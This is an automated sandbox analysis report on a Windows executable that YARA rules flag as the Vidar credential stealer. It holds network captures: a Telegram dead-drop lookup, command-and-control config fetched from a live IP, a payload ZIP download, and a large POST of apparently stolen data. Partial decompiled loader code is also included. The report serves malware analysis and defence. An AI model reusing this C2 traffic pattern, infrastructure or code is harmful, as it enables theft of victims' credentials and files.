May 28, 2023 10:46:23.411657095 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411674023 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411678076 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411699057 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411699057 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411719084 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411719084 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411741018 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411741972 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411760092 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411761999 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411782980 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411782980 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411803961 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411807060 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411822081 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411825895 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411843061 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411847115 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411868095 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411870956 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411889076 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411890984 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411907911 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411910057 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411930084 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411931038 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411951065 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411955118 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411972046 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411979914 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411979914 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411993027 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411994934 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.412014961 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.412014961 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.412035942 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.412060022 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.412308931 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.415275097 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.415294886 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.415314913 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.415333986 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.415354013 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.415364027 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.415375948 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.415410995 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.415426016 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.419998884 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.420101881 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.420320034 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.420382023 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.420384884 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.420428991 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.420433044 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.420479059 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.420484066 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.420525074 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.420527935 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.420567989 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.430624008 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.430943966 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:25.908302069 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:25.908348083 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:25.930308104 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.930320024 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.930577993 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:25.952497959 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.952529907 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.952637911 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.952687979 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.952717066 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.952761889 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:25.952830076 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:25.952852964 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:25.974695921 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.974884987 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:25.974900007 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.975068092 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:25.975225925 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.975272894 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.975315094 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:25.975344896 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:25.976419926 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.976439953 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.976455927 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.976495981 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.976505995 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:25.976552010 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:25.976571083 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.976600885 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.976624012 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.976632118 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.996838093 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.996850014 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.996929884 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.996953964 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.996969938 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.997044086 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.997112036 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.997160912 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.997348070 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.997364998 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.997433901 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.998328924 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.998516083 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.998527050 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.998673916 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:25.998683929 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:26.866523981 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:26.870176077 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:32.636281967 CEST	49685	30303	192.168.2.3	188.34.154.187

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 28, 2023 10:46:22.339339018 CEST	59869	53	192.168.2.3	8.8.8.8
May 28, 2023 10:46:22.353594065 CEST	53	59869	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 28, 2023 10:46:22.339339018 CEST	192.168.2.3	8.8.8.8	0x7ede	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 28, 2023 10:46:22.353594065 CEST	8.8.8.8	192.168.2.3	0x7ede	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

188.34.154.187:30303

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49684	149.154.167.99	443	C:\Users\user\Desktop\06625899.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49685	188.34.154.187	30303	C:\Users\user\Desktop\06625899.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 10:46:22.754666090 CEST	38	OUT	GET /667e85c8112da056f901292caf82b3ed HTTP/1.1 User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Host: 188.34.154.187:30303
May 28, 2023 10:46:23.136292934 CEST	39	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 28 May 2023 08:46:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 61 0d 0a 31 2c 31 2c 30 2c 31 2c 30 2c 36 39 34 35 31 38 35 34 31 65 39 39 62 61 36 61 61 65 35 62 39 36 36 33 66 31 30 37 34 32 38 64 2c 31 2c 31 2c 31 2c 30 2c 30 2c 44 65 73 6b 74 6f 70 3b 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 44 65 73 6b 74 6f 70 5c 3b 2a 2e 74 78 74 3b 33 3b 33 3b 2a 77 69 6e 64 6f 77 73 2a 3b 2c 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a1,1,0,1,0,694518541e99ba6aae5b9663f107428d,1,1,1,0,0,Desktop;%USERPROFILE%\Desktop\;.txt;3;3;windows*;,00
May 28, 2023 10:46:23.140424967 CEST	39	OUT	GET /addon.zip HTTP/1.1 User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Host: 188.34.154.187:30303 Cache-Control: no-cache
May 28, 2023 10:46:23.163690090 CEST	40	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 28 May 2023 08:46:23 GMT Content-Type: application/zip Content-Length: 2685679 Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT Connection: keep-alive ETag: "631f30d3-28faef" Accept-Ranges: bytes Data Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf 7a e5 97 8c 8f 74 79 60 f1 f6 bb c5 c5 15 24 7f 72 7e f6 12 97 57 28 6b 88 b8 c6 12 d9 90 58 a1 45 72 e0 62 59 83 f0 06 da d1 81 a7 e0 4c b7 3d ee f9 0c 53 7e f6 4a f8 4d 87 df 1c f8 4d 83 df fb e0 d7 08 bf ab e0 d7 00 bf b9 f0 ab 87 df 2f c0 af 0e 7e ef 37 6d c9 7e 00 8e 4d c2 18 d4 e6 6a 82 0a 05 d7 98 20 56 2c 83 3a a0 e5 ba 71 6a 7a de 4e a3 07 5e 2e 86 9f 0d d9 79 8f 15 Data Ascii: PK$V%U+m\9\|Pufreebl3.dll\T7>aw(4!)UHhM:H15Nbu&Fv3-d uZnu]})JaP$f(l;@Rwy@R/D}4N3<o/['5'uJX;]Oyg-2w;d?Z?5bFVHjZ ,B#plVicHT~5VKF?E5%F~h:_?}^s,z\|M0w~io)2(ZLf=UFs6uhGyw44xcwLo2f=w=C'UE7zKO?7J}ssj?l;y/k\gul%\qyEWo#75il{dGLmFj9,26d<,kSoMe+2rqfg<!M9DI6&&Qz'\w(drb F#b>5<7@n(%b<:y(P5w MO!}Liz]=pdav\lm2O'LRg5g@#7]Ix_4>CM1#4ba<tp$;.8dw8N_TP}Lvc'bymu0z6I^#+iQ5(zty`$r~W(kXErbYL=S~JMM/~7m~Mj V,:qjzN^.y
May 28, 2023 10:46:25.908302069 CEST	2894	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----0606627400761024 User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Host: 188.34.154.187:30303 Content-Length: 143185 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 10:46:26.866523981 CEST	3037	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 28 May 2023 08:46:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49684	149.154.167.99	443	C:\Users\user\Desktop\06625899.exe

Timestamp	Direction	Data
2023-05-28 08:46:22 UTC	OUT	GET /looking_glassbot HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0 Host: t.me
2023-05-28 08:46:22 UTC	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sun, 28 May 2023 08:46:22 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12469 Connection: close Set-Cookie: stel_ssid=6c42bd253883c73603_10071076040245702359; expires=Mon, 29 May 2023 08:46:22 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2023-05-28 08:46:22 UTC	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6c 6f 6f 6b 69 6e 67 5f 67 6c 61 73 73 62 6f 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @looking_glassbot</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){win

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: 06625899.exePID: 7120, Parent PID: 3452

General

Target ID:	0
Start time:	10:46:00
Start date:	28/05/2023
Path:	C:\Users\user\Desktop\06625899.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\06625899.exe
Imagebase:	0x400000
File size:	404992 bytes
MD5 hash:	22CD094D925FB41F446ED4DB24CC8C35
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.412510711.0000000000838000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 06625899.exePID: 7120, Parent PID: 3452COMMON

Executed Functions

Function 00424430 Relevance: 227.4, APIs: 151, Instructions: 911
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00424430() {
				struct HINSTANCE__* _t1;
				struct HINSTANCE__* _t2;
				CHAR* _t4;
				struct HINSTANCE__* _t5;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				struct HINSTANCE__* _t10;
				struct HINSTANCE__* _t11;
				CHAR* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t20;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t22;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t24;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t26;
				struct HINSTANCE__* _t27;
				_Unknown_base(*)()* _t28;
				CHAR* _t29;
				_Unknown_base(*)()* _t30;
				struct HINSTANCE__* _t31;
				_Unknown_base(*)()* _t32;
				_Unknown_base(*)()* _t33;
				CHAR* _t34;
				_Unknown_base(*)()* _t35;
				struct HINSTANCE__* _t36;
				_Unknown_base(*)()* _t37;
				_Unknown_base(*)()* _t38;
				CHAR* _t39;
				_Unknown_base(*)()* _t40;
				_Unknown_base(*)()* _t42;
				struct HINSTANCE__* _t43;
				_Unknown_base(*)()* _t44;
				_Unknown_base(*)()* _t45;
				CHAR* _t46;
				_Unknown_base(*)()* _t47;
				struct HINSTANCE__* _t48;
				_Unknown_base(*)()* _t49;
				_Unknown_base(*)()* _t51;
				struct HINSTANCE__* _t52;
				_Unknown_base(*)()* _t53;
				_Unknown_base(*)()* _t55;
				struct HINSTANCE__* _t56;
				_Unknown_base(*)()* _t57;
				_Unknown_base(*)()* _t59;
				struct HINSTANCE__* _t60;
				_Unknown_base(*)()* _t61;
				_Unknown_base(*)()* _t62;
				CHAR* _t63;
				_Unknown_base(*)()* _t64;
				struct HINSTANCE__* _t65;
				_Unknown_base(*)()* _t66;
				_Unknown_base(*)()* _t67;
				CHAR* _t68;
				_Unknown_base(*)()* _t69;
				struct HINSTANCE__* _t70;
				_Unknown_base(*)()* _t71;
				_Unknown_base(*)()* _t72;
				CHAR* _t73;
				_Unknown_base(*)()* _t74;
				struct HINSTANCE__* _t75;
				_Unknown_base(*)()* _t77;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				_Unknown_base(*)()* _t80;
				CHAR* _t81;
				_Unknown_base(*)()* _t82;
				struct HINSTANCE__* _t83;
				_Unknown_base(*)()* _t85;
				CHAR* _t86;
				_Unknown_base(*)()* _t87;
				struct HINSTANCE__* _t88;
				_Unknown_base(*)()* _t89;
				_Unknown_base(*)()* _t90;
				CHAR* _t91;
				_Unknown_base(*)()* _t92;
				struct HINSTANCE__* _t93;
				_Unknown_base(*)()* _t94;
				_Unknown_base(*)()* _t96;
				struct HINSTANCE__* _t97;
				_Unknown_base(*)()* _t98;
				_Unknown_base(*)()* _t99;
				CHAR* _t100;
				_Unknown_base(*)()* _t101;
				struct HINSTANCE__* _t102;
				_Unknown_base(*)()* _t103;
				_Unknown_base(*)()* _t104;
				CHAR* _t105;
				_Unknown_base(*)()* _t106;
				struct HINSTANCE__* _t107;
				_Unknown_base(*)()* _t108;
				_Unknown_base(*)()* _t109;
				CHAR* _t110;
				_Unknown_base(*)()* _t111;
				struct HINSTANCE__* _t112;
				_Unknown_base(*)()* _t113;
				_Unknown_base(*)()* _t114;
				CHAR* _t115;
				_Unknown_base(*)()* _t117;
				struct HINSTANCE__* _t118;
				_Unknown_base(*)()* _t119;
				_Unknown_base(*)()* _t120;
				CHAR* _t121;
				_Unknown_base(*)()* _t122;
				struct HINSTANCE__* _t123;
				_Unknown_base(*)()* _t124;
				_Unknown_base(*)()* _t125;
				CHAR* _t126;
				_Unknown_base(*)()* _t127;
				struct HINSTANCE__* _t128;
				_Unknown_base(*)()* _t129;
				_Unknown_base(*)()* _t130;
				CHAR* _t131;
				_Unknown_base(*)()* _t132;
				struct HINSTANCE__* _t133;
				_Unknown_base(*)()* _t134;
				_Unknown_base(*)()* _t135;
				CHAR* _t136;
				_Unknown_base(*)()* _t137;
				struct HINSTANCE__* _t138;
				_Unknown_base(*)()* _t139;
				_Unknown_base(*)()* _t141;
				struct HINSTANCE__* _t142;
				_Unknown_base(*)()* _t143;
				_Unknown_base(*)()* _t145;
				struct HINSTANCE__* _t146;
				_Unknown_base(*)()* _t147;
				_Unknown_base(*)()* _t148;
				CHAR* _t149;
				_Unknown_base(*)()* _t150;
				struct HINSTANCE__* _t151;
				_Unknown_base(*)()* _t152;
				_Unknown_base(*)()* _t154;
				struct HINSTANCE__* _t155;
				_Unknown_base(*)()* _t156;
				_Unknown_base(*)()* _t157;
				CHAR* _t158;
				_Unknown_base(*)()* _t159;
				struct HINSTANCE__* _t160;
				_Unknown_base(*)()* _t161;
				_Unknown_base(*)()* _t162;
				CHAR* _t163;
				_Unknown_base(*)()* _t164;
				struct HINSTANCE__* _t165;
				_Unknown_base(*)()* _t166;
				_Unknown_base(*)()* _t167;
				CHAR* _t168;
				_Unknown_base(*)()* _t169;
				struct HINSTANCE__* _t170;
				_Unknown_base(*)()* _t171;
				_Unknown_base(*)()* _t172;
				CHAR* _t173;
				_Unknown_base(*)()* _t174;
				struct HINSTANCE__* _t175;
				_Unknown_base(*)()* _t176;
				_Unknown_base(*)()* _t177;
				CHAR* _t178;
				_Unknown_base(*)()* _t179;
				struct HINSTANCE__* _t180;
				_Unknown_base(*)()* _t181;
				_Unknown_base(*)()* _t182;
				CHAR* _t183;
				_Unknown_base(*)()* _t184;
				struct HINSTANCE__* _t185;
				_Unknown_base(*)()* _t186;
				_Unknown_base(*)()* _t187;
				CHAR* _t188;
				_Unknown_base(*)()* _t189;
				struct HINSTANCE__* _t190;
				_Unknown_base(*)()* _t191;
				_Unknown_base(*)()* _t192;
				CHAR* _t193;
				_Unknown_base(*)()* _t194;
				struct HINSTANCE__* _t195;
				_Unknown_base(*)()* _t196;
				CHAR* _t198;
				_Unknown_base(*)()* _t199;
